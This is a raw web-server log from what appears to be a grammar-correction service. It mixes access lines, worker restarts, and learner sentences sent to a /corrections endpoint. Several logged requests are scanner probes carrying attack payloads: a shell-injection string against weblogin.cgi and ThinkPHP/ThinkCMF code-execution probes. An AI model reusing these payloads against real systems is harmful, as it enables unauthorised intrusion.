5.134.48.131 - - [02/Jun/2020:22:44:08 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
38.88.252.189 - - [02/Jun/2020:23:03:52 +0000] "GET / HTTP/1.0" 200 146 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
93.40.11.165 - - [02/Jun/2020:23:11:33 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 200 146 "-" "Mozilla/5.0"
209.17.96.66 - - [02/Jun/2020:23:45:58 +0000] "GET / HTTP/1.0" 200 146 "-" "Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)"
95.232.178.47 - - [03/Jun/2020:00:49:32 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
126.35.67.85 - - [03/Jun/2020:01:48:46 +0000] "GET /corrections HTTP/1.1" 200 74 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362"
[2020-06-03 01:50:46 +0000] [33210] [CRITICAL] WORKER TIMEOUT (pid:41394)
[nltk_data] Downloading package punkt to /home/midas/nltk_data...
[nltk_data]   Package punkt is already up-to-date!
[2020-06-03 01:50:46 +0000] [41394] [INFO] worker received SIGABRT signal
[2020-06-03 01:50:46 +0000] [41394] [INFO] Worker exiting (pid: 41394)
[2020-06-03 01:50:46 +0000] [69212] [INFO] Booting worker with pid: 69212
[2020-06-03 01:50:46 +0000] [69212] [INFO] Worker spawned (pid: 69212)
| [src] dictionary: 49999 types
| [tgt] dictionary: 49999 types
Number of models  1
models_loaded
180.248.57.74 - - [03/Jun/2020:01:57:49 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.83.171.224 - - [03/Jun/2020:03:32:14 +0000] "GET / HTTP/1.1" 200 146 "-" "-"
78.175.92.29 - - [03/Jun/2020:04:13:33 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
193.118.53.194 - - [03/Jun/2020:04:14:39 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
195.54.160.135 - - [03/Jun/2020:04:22:32 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [03/Jun/2020:04:30:10 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [03/Jun/2020:04:30:11 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [03/Jun/2020:04:44:30 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
153.242.41.11 - - [03/Jun/2020:04:45:35 +0000] "GET /corrections HTTP/1.1" 200 74 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
153.242.41.11 - - [03/Jun/2020:04:45:35 +0000] "GET /robots.txt HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
153.242.41.11 - - [03/Jun/2020:04:45:35 +0000] "GET /favicon.ico HTTP/1.1" 200 146 "http://52.249.198.83/corrections" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
Input sentence ['test']
153.242.41.11 - - [03/Jun/2020:05:02:27 +0000] "POST /corrections HTTP/1.1" 200 254 "-" "PostmanRuntime/7.25.0"
Input sentence ['i want to teach Mizuki how to drawing manga. i have two reason. Farst, manga is Japaneseculture. Secound, drawing is fun. If they can draw, they will happy. My friend draw manga, and she is very happi. So, i want to teach Mizuki how to draw manga.']
153.242.41.11 - - [03/Jun/2020:05:03:19 +0000] "POST /corrections HTTP/1.1" 200 1876 "-" "PostmanRuntime/7.25.0"
Input sentence ['I can teach math since I studying math every day. I loves math. My students will get good grades.']
153.242.41.11 - - [03/Jun/2020:05:19:29 +0000] "POST /corrections HTTP/1.1" 200 635 "-" "PostmanRuntime/7.25.0"
Input sentence ['The KAT movie. ']
153.242.41.11 - - [03/Jun/2020:05:21:39 +0000] "POST /corrections HTTP/1.1" 200 273 "-" "PostmanRuntime/7.25.0"
103.129.194.32 - - [03/Jun/2020:07:17:46 +0000] "GET / HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.54.160.135 - - [03/Jun/2020:07:32:42 +0000] "POST /api/jsonws/invoke HTTP/1.1" 200 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.243.139.86 - - [03/Jun/2020:07:45:13 +0000] "GET /hudson HTTP/1.1" 200 146 "-" "Mozilla/5.0 zgrab/0.x"
178.128.93.138 - - [03/Jun/2020:07:59:59 +0000] "GET / HTTP/1.0" 200 146 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
